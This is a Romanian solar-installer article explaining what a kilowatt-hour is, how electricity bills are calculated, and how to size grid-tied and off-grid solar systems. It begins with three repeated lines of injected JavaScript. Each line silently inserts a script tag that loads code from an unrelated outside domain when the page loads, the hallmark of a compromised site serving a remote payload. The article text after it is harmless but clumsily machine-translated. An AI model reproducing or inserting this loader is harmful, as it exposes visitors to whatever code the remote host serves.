;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ce este un kilowatt oră? - Agora Solar 2022

Ce este un kilowatt oră?

Kilowatt-oră măsoară consumul și producția de energie. Dacă vă gândiți să alegeti energie solară (sau doriți doar câteva sfaturi despre cum să vă reduceți consumul de energie), probabil ați dat peste termenul de kilowați-oră. Dar exact ce este un kilowatt oră? Și de ce trebuie să știm câți folosim în fiecare lună?

Despre kWh

Ce este un kilowatt oră?

Un kilowatt-oră (kWh) este o măsură a cantității de energie pe care o utilizați într-o perioadă stabilită de timp. Determină cât de mult plătiți pentru electricitate în fiecare lună, deoarece compania de utilități vă facturează pe baza costului pe kWh. Iată cum funcționează.

 

Fiecare aparat are un rating care măsoară câți wați de putere utilizează. De exemplu, un cuptor poate fi evaluat la 2000 de wați sau 2 kilowați. (1 kilowatt este egal cu 1000 de wați.)

 

Dacă gătești ceva în acel cuptor timp de 30 de minute, iată cum să calculezi energia totală utilizată:

2 kilowați x 0,5 ore = 1 kilowatt oră (kWh) de energie utilizată.

Pentru a determina câți kilowați-oră folosește un aparat, estimează pur și simplu cât timp îl folosești în fiecare zi, apoi înmulțește-l cu puterea nominală. Ușor până acum. Dar cum puteți utiliza aceste informații?

Ce este un kilowatt oră?
kilowatt ora

Cum pot calcula consumul?

Măsurarea costului energiei electrice pe kWh

Furnizorii de utilități vă urmăresc utilizarea cu un contor și vă facturează pe baza totalului de kilowați-oră consumat.

 

În Romania, costul mediu al energiei electrice este de aproximativ 60 bani pe kWh. Cu toate acestea, acest lucru poate fluctua în funcție de locul în care locuiți, precum și de ce moment al zilei utilizați electricitatea.

 

Mulți furnizori de utilități facturează tarife variabile pentru timpul de utilizare (numite tarife TOU). Dacă sunteți familiarizat cu conceptul de tarifare la supratensiune, acesta este ceea ce este: electricitatea costă mai mult atunci când o folosește mulți oameni.

 

Există o cerere mai mică în timpul zilei, astfel încât rata este mai mică. Când oamenii vin acasă de la școală și lucrează, rata crește, deoarece cererea este mai mare.

 

De obicei, puteți găsi defalcarea tarifelor TOU pe site-ul furnizorului de utilități sau chiar pe factura electrică.

 

Dar ar putea fi mai rapid să se măsoare modul în care aceste costuri se calculează în funcție de tiparele de utilizare. Împărțiți plata lunară la consumul total de kWh pentru a obține costul mediu al energiei electrice:

Factură electrică de 300 RON / 500 kWh utilizată = 0,60 lei pe kWh

Cum aplicam aceste informatii?

Cum folosim factorul Kilowatt Oră în dimensionarea sistemului solar

Înțelegerea kilowatului-oră este esențială pentru a putea proiecta un sistem care funcționează. Fără aceste informații, sistemul dvs. ar putea fi prea mic pentru a vă acoperi întreaga factură de energie (sau prea mare, caz în care aruncați banii și diluați valoarea investiției dvs.).

 

Deci, folosim utilizarea dvs. de kilowați-oră ca punct de plecare în procesul de proiectare a sistemului. După ce știți câtă energie consumați, puteți dimensiona componentele sistemului pentru a se potrivi cu cerințele de utilizare.

 

Calculatorul nostru de costuri solare vă poate oferi o dimensiune și un cost al sistemului de bază, în funcție de consumul dvs. de kWh. De asemenea, puteți citi despre matematica din spatele acestei formule în detaliu în articolul nostru: „De câte panouri solare am nevoie?”

 

Pentru a obține un calcul precis, trebuie luate în considerare câteva lucruri:

  • Utilizarea medie lunară
  • Utilizare maximă (va crește când ninge sau sunt 40 de grade afară)
  • Schimbări viitoare în tiparele de utilizare a energiei
kilowatt ora

Sistemul dvs. ar trebui să fie dimensionat pentru a vă acoperi pe tot parcursul anului. Asigurați-vă că țineți cont de un an de utilizare, deoarece iernile înghețate și verile de peste 40 de grade tind să distrugă datele de utilizare.

 

De asemenea, luați în considerare cu atenție dacă utilizarea dvs. va crește în viitor. Dacă intenționați să aveți copii, să construiți o nouă magazie pe proprietatea dvs. sau să cumpărați un vehicul electric, aceste lucruri vor consuma mult mai multă energie și consumul dvs. de kWh va crește.

 

Nu trebuie să construiți pentru o utilizare viitoare acum, dar vă ajută să vă planificați sistemul având în vedere extinderea . Anumite echipamente sunt concepute pentru a facilita expansiunea, cum ar fi microinvertoarele și bateriile cu litiu.

Cum folosim factorul Kilowatt Oră în dimensionarea sistemului solar?

Când sunteți conectat la linii electrice, găsirea tuturor acestor informații este simplă. Ia-ți cea mai recentă factură electrică. Furnizorul dvs. tipărește consumul de kWh pe factură în fiecare lună, iar unii indică și tarifele cost-pe-kWh. Acest lucru face mai ușor să calculați dimensiunea sistemului. De asemenea, puteți introduce numărul în calculatorul nostru de costuri solare pentru o estimare rapidă a costurilor și a dimensiunilor. 

 

Sistemele off-grid sunt diferite. Când ieșiți din rețea, probabil că nu veți avea un precedent pentru a afla câtă energie veți folosi. În schimb, va trebui să completați o foaie de evaluare a încărcării , listând fiecare aparat manual și estimând cât de mult le veți folosi în fiecare zi. Utilizarea zilnică a kWh este crucială pentru construirea unui sistem care poate furniza energie neîntreruptă proprietății dvs. din afara rețelei.

 

Nu doriți să vă uitați la utilizarea anuală, ci mai degrabă la nevoile dvs. în fiecare zi. Scopul este de a stoca suficientă energie pentru a vă acoperi dacă apar probleme (cum ar fi vremea severă sau defectarea echipamentului).

 

Oamenii au tendința de a stoca aproximativ o zi de energie în banca lor de baterii și se sprijină pe un generator pentru backup. Dar puteți planifica mai multă pernă cu bateria dvs., dacă doriți o liniște sufletească suplimentară. Pentru a estima utilizarea zilnică, găsiți consumul de kWh (puterea x ore de utilizare în fiecare zi) pentru fiecare aparat mare din casa dvs. din afara rețelei și adăugați-le pe toate împreună.

kilowatt ora
Totalul este utilizarea zilnică, care poate fi utilizată ca bază pentru a vă dimensiona sistemul:

Utilizare zilnică kWh ÷ Ore de soare ÷ 0,9 (factor de ineficiență) = ieșire minimă de matrice solară

Cum se estimează costul solar pe baza utilizării Kilowatt-oră?

Ce este un kilowatt oră?

Ai consumul de kWh la îndemână? Conectați aceste informații la calculatorul nostru de costuri solare pentru a vedea cât de mult vă poate costa să ajungeți la energie solară.

 

Sistemele legate de rețea tind să-și plătească rapid. Este rezonabil să vă așteptați să vă atingeți investiția în 5 ani.

 

Sistemele off-grid costă mai mult și vin cu așteptări diferite. Spre deosebire de sistemele de legare la rețea, valoarea în sistemele din afara rețelei nu face neapărat profit din investiția dvs.

 

În schimb, ar trebui privit ca un mijloc de a genera energie acolo unde nu există acces la liniile electrice. Pentru a determina dacă energia solară în afara rețelei este alegerea potrivită, ar trebui să o comparați cu costul altor metode de generare a energiei, cum ar fi turbine eoliene sau generatoare de gaz.

 

Sunteți interesat de energie solară, dar nu sunteți sigur de unde să începeți? Descărcați Ghidul nostru introductiv pentru a vă pune la curent cu elementele esențiale.